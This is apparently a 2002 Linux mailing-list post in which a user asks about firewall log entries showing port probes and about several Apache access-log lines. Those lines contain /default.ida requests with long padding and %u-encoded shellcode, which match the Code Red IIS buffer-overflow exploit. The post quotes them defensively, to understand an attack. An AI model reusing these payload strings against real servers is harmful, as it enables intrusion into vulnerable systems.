Hello all, I just set up a new LM8.1 machine to act as an internet connection masqerader for a small lan along with a web server. This was on Saturday morning.
When I went by to check on it on Monday morning i noticed several unusual entries in /var/log/messages and /var/log/httpd/access_log. The message file entries are like the following and there were a ton of them, i just included a few as samples: Jan 12 17:16:08 router kernel: auditIN=ppp0 OUT= MAC= SRC=209.58.110.227 DST=204.116.24.143 LEN=40 TOS=0x00 PREC=0x00 TTL=241 ID=64210 PROTO=TCP SPT=21 DPT=21 WINDOW=40 RES=0x00 SYN URGP=0 Jan 12 17:21:20 router kernel: auditIN=ppp0 OUT= MAC= SRC=212.194.119.109 DST=204.116.24.143 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=37628 DF PROTO=TCP SPT=1647 DPT=21 WINDOW=16384 RES=0x00 SYN URGP=0 Jan 13 16:04:26 router kernel: auditIN=ppp0 OUT= MAC= SRC=203.69.167.151 DST=204.116.24.143 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=21029 DF PROTO=TCP SPT=4289 DPT=111 WINDOW=32120 RES=0x00 SYN URGP=0 In /var/log/httpd/access_log I found several entries like the following, again just a sample have been included: 148.246.25.158 - - [12/Jan/2002:22:19:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-" 141.238.17.66 - - [13/Jan/2002:11:25:35 -0500] "GET /default.ida?NNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u909 u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-" 66.82.52.10 - - [13/Jan/2002:16:03:32 -0500] "GET /default.ida?NNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% 858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-" Does anyone have any idea what these entries represent? I know the entries from access_log are GET requests but is someone attempting to break into the system via the web server with them? Thanks, Ian K. Harrell [EMAIL PROTECTED]
Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com